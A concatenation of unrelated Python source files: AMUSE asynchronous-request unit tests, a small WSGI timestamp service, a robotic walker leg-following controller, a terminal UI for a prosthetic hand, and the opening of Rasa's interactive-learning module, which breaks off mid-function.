self.assertEquals(r2.result(),[3,2,1] | units.kg)
instance.stop()
def test17(self):
instance = ForTestingInterface(self.exefile)
instance.do_sleep.asynchronous(1)
request=instance.echo_2_int.asynchronous([11,12,13],[3,2,1])
r1=request["int_out1"]
r2=request["int_out2"]
self.assertEquals(r1.result(),[11,12,13] )
self.assertEquals(r2.result(),[3,2,1] )
instance.stop()
def test18(self):
""" test pool as depedency 1 """
instance1 = ForTesting(self.exefile)
instance2 = ForTesting(self.exefile)
instance3 = ForTesting(self.exefile)
request0=instance1.do_sleep(1, return_request=True)
request1=instance1.echo_int(10, return_request=True)
request2=instance2.echo_int(10, return_request=True)
request=async_request.AsyncRequestsPool(request1,request2)
request3=instance3.echo_int(11, async_dependency=request, return_request=True)
request3.wait()
self.assertTrue(request1.is_result_available())
self.assertTrue(request2.is_result_available())
self.assertEqual( request3.result(), 11)
instance1.stop()
instance2.stop()
instance3.stop()
def test18b(self):
""" test pool as depedency 2 """
instance1 = ForTesting(self.exefile)
instance2 = ForTesting(self.exefile)
instance3 = ForTesting(self.exefile)
request0=instance1.do_sleep(1, return_request=True)
request1=instance1.echo_int(10, return_request=True)
request2=instance1.echo_int(10, return_request=True)
request=async_request.AsyncRequestsPool(request1,request2)
request3=instance3.echo_int(11, async_dependency=request, return_request=True)
request3.wait()
self.assertTrue(request1.is_result_available())
self.assertTrue(request2.is_result_available())
self.assertEqual( request3.result(), 11)
instance1.stop()
instance2.stop()
instance3.stop()
def test19(self):
""" test sum request """
instance1 = ForTesting(self.exefile)
instance2 = ForTesting(self.exefile)
instance1.do_sleep(1, return_request=True)
r1=instance1.echo_int(1, return_request=True)
r2=instance2.echo_int(2, return_request=True)
s=r1+r2
r1=instance1.echo_int(2, return_request=True)
r2=instance2.echo_int(3, return_request=True)
m=r1*r2
r1=instance1.echo_int(12, return_request=True)
r2=instance2.echo_int(3, return_request=True)
d=r1/r2
self.assertEqual( s.result(), 3)
self.assertEqual( m.result(), 6)
self.assertEqual( d.result(), 4)
instance1.stop()
instance2.stop()
def test19b(self):
""" test sum request """
instance1 = ForTesting(self.exefile)
instance2 = ForTesting(self.exefile)
instance1.do_sleep(1, return_request=True)
r1=instance1.echo_int(1, return_request=True)
s=r1+2
r1=instance1.echo_int(2, return_request=True)
m=r1*3
r2=instance2.echo_int(3, return_request=True)
d=12/r2
self.assertEqual( s.result(), 3)
self.assertEqual( m.result(), 6)
self.assertEqual( d.result(), 4)
instance1.stop()
instance2.stop()
def test20(self):
""" some more tests of request expressions """
instance1 = ForTesting(self.exefile)
instance2 = ForTesting(self.exefile)
instance3 = ForTesting(self.exefile)
instance1.do_sleep(1, return_request=True)
request1=instance1.echo_2_int(1 | units.m , 2 | units.kg, return_request=True)
request2=instance2.echo_2_int(4 | units.m , 6 | units.kg, return_request=True)
request3a=instance3.echo_int(request2[0] / request1[0]-4, return_request=True)
request3b=instance3.echo_int(request2[1] / request1[1]-3, return_request=True)
request3a.wait()
request3b.wait()
self.assertEqual( request3a.result(), 0 )
self.assertEqual( request3b.result(), 0 )
instance1.stop()
instance2.stop()
instance3.stop()
def test21(self):
""" test sum request, sockets """
instance1 = ForTesting(self.exefile, channel_type="sockets")
instance2 = ForTesting(self.exefile, channel_type="sockets")
instance1.do_sleep(1, return_request=True)
r1=instance1.echo_int(1, return_request=True)
r2=instance2.echo_int(2, return_request=True)
s=r1+r2
r1=instance1.echo_int(2, return_request=True)
r2=instance2.echo_int(3, return_request=True)
m=r1*r2
r1=instance1.echo_int(12, return_request=True)
r2=instance2.echo_int(3, return_request=True)
d=r1/r2
self.assertEqual( s.result(), 3)
self.assertEqual( m.result(), 6)
self.assertEqual( d.result(), 4)
instance1.stop()
instance2.stop()
def test21(self):
""" some more tests of request expressions """
instance1 = ForTesting(self.exefile)
a=[10,30,15] | units.m
b=[1,3,5] | units.kg
instance1.do_sleep(1, return_request=True)
request1=instance1.echo_2_int(a , b, return_request=True)
request2=(3*request1[1]/(2.*request1[0])+(55. | units.kg/units.m))
self.assertEquals( request2.result(), (3*b/(2.*a)+(55. | units.kg/units.m)) )
instance1.stop()
def test22(self):
""" tests of unpack """
instance1 = ForTesting(self.exefile)
a=[10,30,15] | units.m
b=[1,3,5] | units.kg
#~ instance1.do_sleep(1, return_request=True)
a_,b_=instance1.echo_2_int(a , b, return_request=True)
self.assertEquals( (3*b_/(2.*a_)+(55. | units.kg/units.m)).result(), (3*b/(2.*a)+(55. | units.kg/units.m)) )
instance1.stop()
def test23(self):
""" tests of unpack """
instance1 = ForTestingInterface(self.exefile)
a=[10,30,15]
b=[1,3,5]
#~ instance1.do_sleep(1, return_request=True)
res=instance1.echo_2_int.asynchronous(a,b)
#~ res=res['int_out1']
a_,b_, err= res
self.assertEquals( a,a_.result() )
self.assertEquals( b,b_.result() )
instance1.stop()
def test24(self):
""" more test of pool """
instance1 = ForTesting(self.exefile)
instance2 = ForTesting(self.exefile)
r1=instance1.echo_int(1, return_request=True)
r2=instance1.echo_int(2, return_request=True)
r3=instance2.echo_int(3, return_request=True)
r4=instance2.echo_int(4, return_request=True)
p1=r1.join(r3)
p2=r2.join(r4)
p3=p1.join(p2)
self.assertTrue(p3 is p1)
p3.waitall()
self.assertEqual(r1.result(), 1)
self.assertEqual(r2.result(), 2)
self.assertEqual(r3.result(), 3)
self.assertEqual(r4.result(), 4)
instance1.stop()
instance2.stop()
def test25(self):
""" more test of pool: calls of same code """
from amuse.rfi.async_request import AsyncRequestsPool
instance1 = ForTesting(self.exefile)
r1=instance1.do_sleep(1, return_request=True)
r2=instance1.echo_int(2, return_request=True)
p1=AsyncRequestsPool()
r1.wait()
r2.wait()
p1.add_request(r1)
p1.add_request(r2)
#~ p1=r1.join(r2)
p1.waitall()
self.assertEqual(r2.result(), 2)
instance1.stop()
def test30(self):
""" test a grid attribute request """
instance1 = ForTesting(self.exefile, redirection="none")
self.assertEquals(instance1.grid.x, numpy.arange(1,11) |units.m)
instance1.do_sleep(1, return_request=True)
t1=time.time()
request=instance1.grid.request.x
t2=time.time()
self.assertLess(t2-t1, 0.5)
self.assertEquals(request.result(), numpy.arange(1,11) | units.m)
t2=time.time()
self.assertGreater(t2-t1, 1.)
def test31(self):
""" test a grid attribute request, subgrids """
instance1 = ForTesting(self.exefile, redirection="none")
self.assertEquals(instance1.grid.x, numpy.arange(1,11) |units.m)
instance1.do_sleep(1, return_request=True)
t1=time.time()
request=instance1.grid[:5].request.x
request2=instance1.grid[5:].request.x
t2=time.time()
self.assertLess(t2-t1, 0.5)
self.assertEquals(request.result(), numpy.arange(1,6) | units.m)
self.assertEquals(request2.result(), numpy.arange(6,11) | units.m)
t2=time.time()
self.assertGreater(t2-t1, 1.)
def test32(self):
""" test a grid attribute request setter """
instance1 = ForTesting(self.exefile, redirection="none")
instance1.grid.x=(66.+numpy.arange(1,11)) |units.m
self.assertEquals(instance1.grid.x, (66.+numpy.arange(1,11)) |units.m)
t1=time.time()
instance1.do_sleep(1, return_request=True)
instance1.grid.request.x=(11.+numpy.arange(1,11)) |units.m
t2=time.time()
self.assertLess(t2-t1, 0.5)
instance1.async_request.wait()
t2=time.time()
self.assertGreater(t2-t1, 1.)
t1=time.time()
self.assertEquals(instance1.grid.x, (11.+numpy.arange(1,11)) | units.m)
t2=time.time()
self.assertLess(t2-t1, 0.5)
def test33(self):
""" test a grid attribute request, subgrids """
instance1 = ForTesting(self.exefile, redirection="none")
self.assertEquals(instance1.grid.x, numpy.arange(1,11) |units.m)
t1=time.time()
instance1.do_sleep(1, return_request=True)
instance1.grid[::2].request.x=(11.+numpy.arange(1,11,2)) |units.m
t2=time.time()
self.assertLess(t2-t1, 0.5)
instance1.async_request.wait()
t2=time.time()
self.assertGreater(t2-t1, 1.)
self.assertEquals(instance1.grid.x[::2], (11.+numpy.arange(1,11,2)) | units.m)
self.assertEquals(instance1.grid.x[1::2], (numpy.arange(2,11,2)) | units.m)
def test34(self):
""" test a grid attribute request, subgrids """
instance1 = ForTesting(self.exefile, redirection="none")
grid=instance1.grid.copy()
request=instance1.grid.request.x
self.assertEquals(request.result(), numpy.arange(1,11) | units.m)
def test35(self):
""" test a grid attribute request setter with state"""
instance1 = ForTestingWithState(self.exefile, redirection="none")
t1=time.time()
instance1.do_sleep(1, return_request=True)
self.assertEquals(instance1.get_name_of_current_state(), '1')
instance1.grid.request.x=(11.+numpy.arange(1,11)) |units.m
self.assertEquals(instance1.get_name_of_current_state(), '2')
t2=time.time()
self.assertGreater(t2-t1, 1.) # first time, state calls dummy (blocking) -> wait
t1=time.time()
instance1.do_sleep(1, return_request=True)
instance1.grid.request.x=(12.+numpy.arange(1,11)) |units.m
t2=time.time()
self.assertLess(t2-t1, 0.5) # second time should be less
instance1.async_request.wait()
t2=time.time()
self.assertGreater(t2-t1, 1.)
t1=time.time()
self.assertEquals(instance1.grid.x, (12. +numpy.arange(1,11)) | units.m)
t2=time.time()
self.assertLess(t2-t1, 0.5)
def test36(self):
""" more state tests"""
instance1 = ForTestingWithState(self.exefile, redirection="none")
self.assertEquals(instance1.get_name_of_current_state(), '1')
# this documents current behaviour:
instance1.dummy(return_request=True)
self.assertEquals(instance1.get_name_of_current_state(), '1')
instance1.async_request.wait()
self.assertEquals(instance1.get_name_of_current_state(), '2')
# ie state changes upon completion of call at wait. This is
# sort of ok, alternatively state could be changed immediately...
class TestASyncDistributed(TestASync):
@classmethod
def setup_class(cls):
cls.check_not_in_mpiexec()
super(TestASyncDistributed, cls).setup_class()
cls.distinstance = cls.new_instance_of_an_optional_code(DistributedAmuse)#, redirection='none')
cls.distinstance.parameters.debug = False
#~ print "Resources:"
#~ print cls.distinstance.resources
pilot = Pilot()
pilot.resource_name='local'
pilot.node_count=1
pilot.time= 2|units.hour
pilot.slots_per_node=8
pilot.label='local'
cls.distinstance.pilots.add_pilot(pilot)
#~ print "Pilots:"
#~ print cls.distinstance.pilots
#~ print "Waiting for pilots"
cls.distinstance.wait_for_pilots()
cls.distinstance.use_for_all_workers()
@classmethod
def tearDown(cls):
#~ print "Stopping distributed code"
cls.distinstance.stop()
@classmethod
def check_not_in_mpiexec(cls):
"""
The tests will fork another process, if the test run
is itself an mpi process, the tests may fail.
For the hydra process manager the tests will fail.
So skip the tests if we detect hydra
"""
if 'HYDI_CONTROL_FD' in os.environ:
return
if 'HYDRA_CONTROL_FD' in os.environ or 'PMI_FD' in os.environ:
cls.skip('cannot run the socket tests under hydra process manager')
|
resilient-service.py
|
# -*- coding: utf-8 -*-
from datetime import datetime
import io
import os.path
import time
import threading
from wsgiref.validate import validator
from wsgiref.simple_server import make_server
EXCHANGE_FILE = "./exchange.dat"
def update_exchange_file():
"""
Writes the current date and time every 10 seconds into the exchange file.
The file is created if it does not exist.
"""
print("Will update the exchange file")
while True:
with io.open(EXCHANGE_FILE, "w") as f:
f.write(datetime.now().isoformat())
time.sleep(10)
def simple_app(environ, start_response):
"""
Read the contents of the exchange file and return it.
"""
if not os.path.exists(EXCHANGE_FILE):
start_response(
'503 Service Unavailable',
[('Content-type', 'text/plain')]
)
return [b'Exchange file is not ready']
start_response('200 OK', [('Content-type', 'text/plain')])
with io.open(EXCHANGE_FILE) as f:
return [f.read().encode('utf-8')]
if __name__ == '__main__':
t = threading.Thread(target=update_exchange_file)
t.start()
httpd = make_server('', 8080, simple_app)
print("Listening on port 8080....")
try:
httpd.serve_forever()
except KeyboardInterrupt:
httpd.shutdown()
t.join(timeout=1)
|
FrontFollowing.py
|
import numpy as np
import os,sys
pwd = os.path.abspath(os.path.abspath(__file__))
father_path = os.path.abspath(os.path.dirname(pwd) + os.path.sep + "..")
sys.path.append(father_path)
data_path = os.path.abspath(
os.path.dirname(os.path.abspath(__file__)) + os.path.sep + ".." +
os.path.sep + "data")
import time
import threading
from Sensors import IRCamera, IMU
from Following.Preprocessing import Leg_detector
from Following.Network import FrontFollowingNetwork as FFL
from Driver import ControlOdometryDriver as cd
"""portal num"""
camera_portal = '/dev/ttyUSB0'
lidar_portal = '/dev/ttyUSB3'
# IMU_walker_portal = '/dev/ttyUSB0'
IMU_human_portal = '/dev/ttyUSB1'
# IMU_left_leg_portal = '/dev/ttyUSB6'
# IMU_right_leg_portal = '/dev/ttyUSB3'
# IMU_human_portal = '/dev/ttyUSB5'
# IMU_left_leg_portal = '/dev/ttyUSB6'
# IMU_right_leg_portal = '/dev/ttyUSB7'
Camera = IRCamera.IRCamera()
LD = Leg_detector.Leg_detector(lidar_portal)
CD = cd.ControlDriver(record_mode=True, left_right=0)
win_width = 10
FrontFollowingModel = FFL.FrontFollowing_Model(win_width=win_width)
weight_path = "./checkpoints_combine/Combine"
FrontFollowingModel.combine_net.load_weights(weight_path)
# IMU_walker = IMU.IMU(name="walker")
# IMU_walker.open_serial(IMU_walker_portal)
# IMU_right_leg = IMU.IMU(name="right_leg")
# IMU_right_leg.open_serial(IMU_right_leg_portal)
# IMU_left_leg = IMU.IMU(name="left_leg")
# IMU_left_leg.open_serial(IMU_left_leg_portal)
IMU_human = IMU.IMU(name="human")
IMU_human.open_serial(IMU_human_portal)
# IMU_human = IMU.IMU(name="human")
# IMU_human.open_serial(IMU_human_portal)
"""recording output"""
file_path = os.path.abspath(data_path+os.path.sep+"output.txt")
def position_calculation(left_leg: np.ndarray, right_leg: np.ndarray,
position_buffer: np.ndarray, weight_array: np.ndarray):
"""buffer used to average the position information with special weight
weight position is a 1 X buffer_length matrix to decide the weight"""
human_position = (left_leg + right_leg) / 2
new_buffer = np.copy(position_buffer)
new_buffer[0:new_buffer.shape[0] - 1, :] = position_buffer[1:position_buffer.shape[0], :]
new_buffer[-1, 0] = left_leg[0]
new_buffer[-1, 1] = left_leg[1]
new_buffer[-1, 2] = right_leg[0]
new_buffer[-1, 3] = right_leg[1]
new_buffer[-1, 4] = human_position[0]
new_buffer[-1, 5] = human_position[1]
# current_position = np.matmul(weight_array, new_buffer)[0]
current_position = np.mean(new_buffer, axis=0)
return current_position, new_buffer
def main_FFL(CD: cd.ControlDriver, LD: Leg_detector.Leg_detector, IR: IRCamera.IRCamera, FFL_Model:FFL.FrontFollowing_Model, file_path, IMU:IMU.IMU):
# weight buffer for lidar detection
position_buffer_length = 3
position_buffer = np.zeros((position_buffer_length, 6))
weight_array = np.array((range(1, position_buffer_length + 1))).reshape((1, 3))
weight_array = weight_array / weight_array.sum()
CD.speed = 0
CD.omega = 0
CD.radius = 0
# walker rear wheel distance = 56
# data buffer for neural network
max_ir = 40
min_ir = 10
ir_data_width = 768
additional_data_width = 4
buffer_length = win_width
buffer = np.zeros((buffer_length * (ir_data_width + additional_data_width), 1))
file_record = open(file_path,'w')
while True:
IR.get_irdata_once()
if len(IR.temperature) == 768:
# update buffer and predict
normalized_temperature = np.array(IR.temperature).reshape((ir_data_width, 1))
normalized_temperature = (normalized_temperature - min_ir) / (max_ir - min_ir)
buffer[0:(buffer_length - 1) * ir_data_width, 0] = buffer[ir_data_width:buffer_length * ir_data_width, 0]
buffer[(buffer_length - 1) * ir_data_width:buffer_length * ir_data_width] = normalized_temperature
"""additional part start index"""
PART2 = buffer_length * ir_data_width
additional_data = [LD.left_leg[0], LD.left_leg[1], LD.right_leg[0], LD.right_leg[1]]
additional_data = np.array(additional_data) / 40 + 0.4
additional_data = np.reshape(additional_data, (additional_data.shape[0], 1))
buffer[PART2:PART2 + (buffer_length - 1) * additional_data_width, 0] = \
buffer[PART2 + additional_data_width:PART2 + buffer_length * additional_data_width, 0]
buffer[PART2 + (buffer_length - 1) * additional_data_width:PART2 + buffer_length * additional_data_width] = \
additional_data
buffer[PART2:PART2 + buffer_length * additional_data_width, 0] = buffer[
PART2:PART2 + buffer_length * additional_data_width,
0]
predict_buffer = buffer.reshape((-1, buffer_length * (ir_data_width + additional_data_width), 1))
result = FFL_Model.combine_net.predict(predict_buffer)
max_possibility = result.max()
action_label = np.unravel_index(np.argmax(result), result.shape)[1]
current_left_leg = LD.left_leg
current_right_leg = LD.right_leg
current_position, position_buffer = position_calculation(current_left_leg, current_right_leg,
position_buffer, weight_array)
max_boundary=14.5 #left max value
min_boundary=-14 #right max value
forward_boundry = 8
backward_boundry = -5
center_left_boundry = 1 #change gwz
center_right_boundry = 0.3
left_boundry = 8.5 #change gwz
right_boundry = -7
if backward_boundry > current_position[4] > -40:
CD.speed = -0.1
CD.omega = 0
CD.radius = 0
str1 = "backward"
elif current_position[4] > forward_boundry:
if current_position[5] > center_left_boundry \
and current_position[0] > current_position[2] \
and current_position[1] > left_boundry :
# and action_label==2 :
CD.speed = 0
radius = 30+abs(50*(max_boundary-current_position[1])/(max_boundary-left_boundry))
if radius < 50 :
radius = 50
CD.radius = radius
CD.omega = 10/CD.radius
str1 = "left"
time.sleep(0.1)
elif current_position[5] < center_right_boundry \
and current_position[2] > current_position[0] \
and current_position[3] < right_boundry :
# and action_label== 3 :
CD.speed = 0
radius = 30+abs(50*(current_position[3]-min_boundary)/(right_boundry-min_boundary))
if radius < 50 :
radius = 50
CD.radius = radius
CD.omega = -10/CD.radius
str1 = "right"
time.sleep(0.1)
else:
CD.speed = 0.1
CD.omega = 0
CD.radius = 0
str1 = "forward"
elif action_label== 4 :
CD.speed = 0
radius = abs(20*(center_left_boundry-current_position[1])/(max_boundary-center_left_boundry))
if radius < 10:
radius = 10
CD.radius = 0
CD.omega = 0.2
str1 = "left in space"
time.sleep(0.1)
elif action_label== 5:
CD.speed = 0
radius = abs(20*(current_position[3]-min_boundary)/(center_left_boundry-min_boundary))
if radius < 10 :
radius = 10
CD.radius = 0
CD.omega = -0.2
str1 = "right in space"
time.sleep(0.1)
else:
CD.speed=0
CD.omega=0
CD.radius = 0
str1 = "stop"
print("\rleft leg:%.2f,%.2f right:%.2f,%.2f human:%.2f,%.2f choice:%s,%.2f,%.2f,%.2f "
%(current_position[0], current_position[1], current_position[2],
current_position[3], current_position[4], current_position[5],str1,CD.speed,CD.omega,CD.radius),end="")
# record.append(str1)
record = [action_label] + current_position.tolist() + list(IMU.a) + list(IMU.w) + list(IMU.Angle)
file_record.write(str1+" "+str(record)+"\n")
file_record.flush()
thread_leg = threading.Thread(target=LD.scan_procedure, args=(False,True,))
thread_cd = threading.Thread(target=CD.control_part, args=())
thread_main = threading.Thread(target=main_FFL, args=(CD, LD, Camera, FrontFollowingModel,file_path,IMU_human))
# thread_IMU_walker = threading.Thread(target=IMU_walker.read_record,args=())
thread_IMU_human = threading.Thread(target=IMU_human.read_record,args=())
thread_IMU_human = threading.Thread(target=IMU_human.read_record,args=())
# thread_IMU_left = threading.Thread(target=IMU_left_leg.read_record,args=())
# thread_IMU_right = threading.Thread(target=IMU_right_leg.read_record,args=())
thread_leg.start()
time.sleep(3)
thread_cd.start()
thread_main.start()
# thread_IMU_human.start()
# thread_IMU_walker.start()
thread_IMU_human.start()
# thread_IMU_walker.start()
# thread_IMU_left.start()
# thread_IMU_right.start()
|
terminal-ui.py
|
import npyscreen
import curses.ascii
from curses import endwin
from hand_object import hand
from communication_framework import Comframe, getOpenPorts
from ui_widgets import TSlider, TimeSlider, BoxSelectOne, BoxOptions, PortBox
class MainForm(npyscreen.FormBaseNew):
DEFAULT_LINES = 26
def create(self):
# Init Form and Objects
if(self.parentApp.demomode is True):
self.name = "3D-Bionics Hand Control Software DEMO"
else:
self.name = "3D-Bionics Hand Control Software"
self.comframe = self.parentApp.comframe
self.hand = self.parentApp.hand
y, x = self.useable_space()
left = round(x*2/3)
# Create UI
self.nextrely = 3
self.klein = self.add(TSlider, max_width=left,name = "Klein")
self.nextrely +=1
self.ring = self.add(TSlider, max_width=left, name = "Ring")
self.nextrely +=1
self.mittel = self.add(TSlider, max_width=left, name = "Mittel")
self.nextrely +=1
self.zeige = self.add(TSlider, max_width=left, name = "Zeige")
self.nextrely +=1
self.daumen = self.add(TSlider, max_width=left, name = "Daumen")
self.nextrely += 3
self.timeslider = self.add(TimeSlider, max_width=round(left/1.5), value=0.3, name = "Delay", hidden = True)
self.nextrely = y-3
self.ports = self.add(PortBox,max_width=left)
self.nextrelx = left + 10
self.nextrely = 2
self.quickPos = self.add(BoxSelectOne, max_height= round((y-2)/2), name = "Quick Positions")
self.nextrely += 1
self.reloadPos = self.add(npyscreen.ButtonPress, name="Nochmal!", relx=self.nextrelx+15, when_pressed_function = lambda : self.quickPos.entry_widget.setPosition() )
self.nextrely += 1
self.options = self.add(BoxOptions)
# init handlers
handlers = {
'^Q': self.exit_func,
curses.ascii.ESC: self.exit_func
}
self.add_handlers(handlers)
# Additional Config
self.keypress_timeout=1
def afterEditing(self):
self.parentApp.setNextForm(None)
def while_waiting(self):
self.updatePos()
def sendPos(self):
new_pos = [[
int(self.klein.value),
int(self.ring.value),
int(self.mittel.value),
int(self.zeige.value),
int(self.daumen.value)
]]
self.comframe.queue_clear()
self.comframe.queue_position(new_pos)
def reloadQuickPos(self):
self.quickPos.entry_widget.setPosition()
def updatePos(self):
self.klein.set_value(self.hand.getKlein())
self.mittel.set_value(self.hand.getMittel())
self.ring.set_value(self.hand.getRing())
self.zeige.set_value(self.hand.getZeige())
self.daumen.set_value(self.hand.getDaumen())
self.display()
# Various functions
def exit_func(self, _input):
self.editing = False
class hand_controll(npyscreen.NPSAppManaged):
def __init__(self, comframe: Comframe,hand: hand,demomode = None):
self.comframe = comframe
self.hand = hand
self.demomode = demomode
super(hand_controll,self).__init__()
def onStart(self):
self.addForm("MAIN", MainForm)
if __name__ == "__main__":
import argparse
from demo import Demo
import threading
# Define Parser for arguments frim commandline
def CLIParser():
parser = argparse.ArgumentParser(description="The 3D-Bionics Hand Controll software,")
parser.add_argument('-v','--version', action='version',version='%(prog)s 1.0')
parser.add_argument('-p','--port', help="Specify the serial-port of the 3D-Bionics Hand" )
parser.add_argument('--getAvailablePorts', help="Displays a list of all available ports", action='version',version= "\n".join(getOpenPorts()))
parser.add_argument('-d','--demo', help="For demonstration purposes. Plays a sequenze of animations defindend in demo.py", action="store_true")
return parser.parse_args()
args = CLIParser()
# Intizialize Handobject and Communication-Framework
hand_object = hand()
try:
comframe = Comframe(hand_object, args.port)
except:
if args.port:
print("Connection Error: Could not open connection in specified port")
else:
print("Connection Error: No valid serial port detected!")
print("Make sure the arduino is connected and that the application has access right to the serial-port")
quit()
# Start thread with demo-script. See demo.py to see how it works
if args.demo:
threading.Thread(target=Demo,args=(comframe,), daemon=True).start()
# Start App
App = hand_controll(comframe,hand_object,args.demo)
App.run()
|
interactive.py
|
import asyncio
import logging
import os
import tempfile
import textwrap
import uuid
from functools import partial
from multiprocessing import Process
from typing import Any, Callable, Dict, List, Optional, Text, Tuple, Union, Set
import numpy as np
from aiohttp import ClientError
from colorclass import Color
from rasa.nlu.training_data.loading import MARKDOWN, RASA
from sanic import Sanic, response
from sanic.exceptions import NotFound
from terminaltables import AsciiTable, SingleTable
import questionary
import rasa.cli.utils
from questionary import Choice, Form, Question
from rasa.cli import utils as cliutils
from rasa.core import constants, run, train, utils
from rasa.core.actions.action import ACTION_LISTEN_NAME, default_action_names
from rasa.core.channels.channel import UserMessage
from rasa.core.constants import (
DEFAULT_SERVER_FORMAT,
DEFAULT_SERVER_PORT,
DEFAULT_SERVER_URL,
REQUESTED_SLOT,
UTTER_PREFIX,
)
from rasa.core.domain import Domain
import rasa.core.events
from rasa.core.events import (
ActionExecuted,
ActionReverted,
BotUttered,
Event,
Restarted,
UserUttered,
UserUtteranceReverted,
)
from rasa.core.interpreter import INTENT_MESSAGE_PREFIX, NaturalLanguageInterpreter
from rasa.core.trackers import EventVerbosity, DialogueStateTracker
from rasa.core.training import visualization
from rasa.core.training.visualization import (
VISUALIZATION_TEMPLATE_PATH,
visualize_neighborhood,
)
from rasa.core.utils import AvailableEndpoints
from rasa.utils.common import update_sanic_log_level
from rasa.utils.endpoints import EndpointConfig
# noinspection PyProtectedMember
from rasa.nlu.training_data import loading
from rasa.nlu.training_data.message import Message
# WARNING: This command line UI is using an external library
# communicating with the shell - these functions are hard to test
# automatically. If you change anything in here, please make sure to
# run the interactive learning and check if your part of the "ui"
# still works.
import rasa.utils.io as io_utils
logger = logging.getLogger(__name__)
MAX_VISUAL_HISTORY = 3
PATHS = {
"stories": "data/stories.md",
"nlu": "data/nlu.md",
"backup": "data/nlu_interactive.md",
"domain": "domain.yml",
}
SAVE_IN_E2E = False
# choose other intent, making sure this doesn't clash with an existing intent
OTHER_INTENT = uuid.uuid4().hex
OTHER_ACTION = uuid.uuid4().hex
NEW_ACTION = uuid.uuid4().hex
NEW_TEMPLATES = {}
MAX_NUMBER_OF_TRAINING_STORIES_FOR_VISUALIZATION = 200
DEFAULT_STORY_GRAPH_FILE = "story_graph.dot"
class RestartConversation(Exception):
"""Exception used to break out the flow and restart the conversation."""
pass
class ForkTracker(Exception):
"""Exception used to break out the flow and fork at a previous step.
The tracker will be reset to the selected point in the past and the
conversation will continue from there."""
pass
class UndoLastStep(Exception):
"""Exception used to break out the flow and undo the last step.
The last step is either the most recent user message or the most
recent action run by the bot."""
pass
class Abort(Exception):
"""Exception used to abort the interactive learning and exit."""
pass
async def send_message(
endpoint: EndpointConfig,
sender_id: Text,
message: Text,
parse_data: Optional[Dict[Text, Any]] = None,
) -> Dict[Text, Any]:
"""Send a user message to a conversation."""
payload = {
"sender": UserUttered.type_name,
"text": message,
"parse_data": parse_data,
}
return await endpoint.request(
json=payload, method="post", subpath=f"/conversations/{sender_id}/messages"
)
async def request_prediction(
endpoint: EndpointConfig, sender_id: Text
) -> Dict[Text, Any]:
"""Request the next action prediction from core."""
return await endpoint.request(
method="post", subpath=f"/conversations/{sender_id}/predict"
)
async def retrieve_domain(endpoint: EndpointConfig) -> Dict[Text, Any]:
"""Retrieve the domain from core."""
return await endpoint.request(
method="get", subpath="/domain", headers={"Accept": "application/json"}
)
async def retrieve_status(endpoint: EndpointConfig) -> Dict[Text, Any]:
"""Retrieve the status from core."""
return await endpoint.request(method="get", subpath="/status")
async def retrieve_tracker(
endpoint: EndpointConfig,
sender_id: Text,
verbosity: EventVerbosity = EventVerbosity.ALL,
) -> Dict[Text, Any]:
"""Retrieve a tracker from core."""
path = "/conversations/{}/tracker?include_events={}".format(
sender_id, verbosity.name
)
return await endpoint.request(
method="get", subpath=path, headers={"Accept": "application/json"}
)
async def send_action(
endpoint: EndpointConfig,
sender_id: Text,
action_name: Text,
policy: Optional[Text] = None,
confidence: Optional[float] = None,
is_new_action: bool = False,
) -> Dict[Text, Any]:
"""Log an action to a conversation."""
payload = ActionExecuted(action_name, policy, confidence).as_dict()
subpath = f"/conversations/{sender_id}/execute"
try:
return await endpoint.request(json=payload, method="post", subpath=subpath)
except ClientError:
if is_new_action:
if action_name in NEW_TEMPLATES:
warning_questions = questionary.confirm(
"WARNING: You have created a new action: '{}', "
"with matching template: '{}'. "
"This action will not return its message in this session, "
"but the new utterance will be saved to your domain file "
"when you exit and save this session. "
"You do not need to do anything further. "
"".format(action_name, [*NEW_TEMPLATES[action_name]][0])
)
await _ask_questions(warning_questions, sender_id, endpoint)
else:
warning_questions = questionary.confirm(
"WARNING: You have created a new action: '{}', "
"which was not successfully executed. "
"If this action does not return any events, "
"you do not need to do anything. "
"If this is a custom action which returns events, "
"you are recommended to implement this action "
"in your action server and try again."
"".format(action_name)
)
await _ask_questions(warning_questions, sender_id, endpoint)
payload = ActionExecuted(action_name).as_dict()
return await send_event(endpoint, sender_id, payload)
else:
logger.error("failed to execute action!")
raise
async def send_event(
endpoint: EndpointConfig,
sender_id: Text,
evt: Union[List[Dict[Text, Any]], Dict[Text, Any]],
) -> Dict[Text, Any]:
"""Log an event to a conversation."""
subpath = f"/conversations/{sender_id}/tracker/events"
return await endpoint.request(json=evt, method="post", subpath=subpath)
def format_bot_output(message: BotUttered) -> Text:
"""Format a bot response to be displayed in the history table."""
# First, add text to output
output = message.text or ""
# Then, append all additional items
data = message.data or {}
if not data:
return output
if data.get("image"):
output += "\nImage: " + data.get("image")
if data.get("attachment"):
output += "\nAttachment: " + data.get("attachment")
if data.get("buttons"):
output += "\nButtons:"
choices = cliutils.button_choices_from_message_data(
data, allow_free_text_input=True
)
for choice in choices:
output += "\n" + choice
if data.get("elements"):
output += "\nElements:"
for idx, element in enumerate(data.get("elements")):
element_str = cliutils.element_to_string(element, idx)
output += "\n" + element_str
if data.get("quick_replies"):
output += "\nQuick replies:"
for idx, element in enumerate(data.get("quick_replies")):
element_str = cliutils.element_to_string(element, idx)
output += "\n" + element_str
return output
def latest_user_message(events: List[Dict[Text, Any]]) -> Optional[Dict[Text, Any]]:
"""Return most recent user message."""
for i, e in enumerate(reversed(events)):
if e.get("event") == UserUttered.type_name:
return e
return None
def all_events_before_latest_user_msg(
events: List[Dict[Text, Any]]
) -> List[Dict[Text, Any]]:
"""Return all events that happened before the most recent user message."""
for i, e in enumerate(reversed(events)):
if e.get("event") == UserUttered.type_name:
return events[: -(i + 1)]
return events
async def _ask_questions(
questions: Union[Form, Question],
sender_id: Text,
endpoint: EndpointConfig,
is_abort: Callable[[Dict[Text, Any]], bool] = lambda x: False,
) -> Any:
"""Ask the user a question, if Ctrl-C is pressed provide user with menu."""
should_retry = True
answers = {}
while should_retry:
answers = questions.ask()
if answers is None or is_abort(answers):
should_retry = await _ask_if_quit(sender_id, endpoint)
else:
should_retry = False
return answers
def _selection_choices_from_intent_prediction(
predictions: List[Dict[Text, Any]]
) -> List[Dict[Text, Any]]:
""""Given a list of ML predictions create a UI choice list."""
sorted_intents = sorted(predictions, key=lambda k: (-k["confidence"], k["name"]))
choices = []
for p in sorted_intents:
name_with_confidence = "{:03.2f} {:40}".format(
p.get("confidence"), p.get("name")
)
choice = {"name": name_with_confidence, "value": p.get("name")}
choices.append(choice)
return choices
async def _request_free_text_intent(sender_id: Text, endpoint: EndpointConfig) -> Text:
